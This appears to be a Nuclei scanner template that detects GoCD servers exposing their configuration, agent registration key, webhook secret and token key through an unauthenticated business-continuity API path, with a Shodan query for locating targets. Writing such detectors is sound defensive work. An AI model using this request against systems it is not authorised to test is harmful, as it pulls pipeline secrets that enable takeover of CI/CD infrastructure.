id: gocd-server-configuration

info:
  name: GoCd Server Configuration
  author: dhiyaneshDk
  severity: high
  reference:
    - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
  tags: go,lfi,gocd
  metadata:
    shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "server agentAutoRegisterKey"
          - "webhookSecret"
          - "tokenGenerationKey"
        condition: and
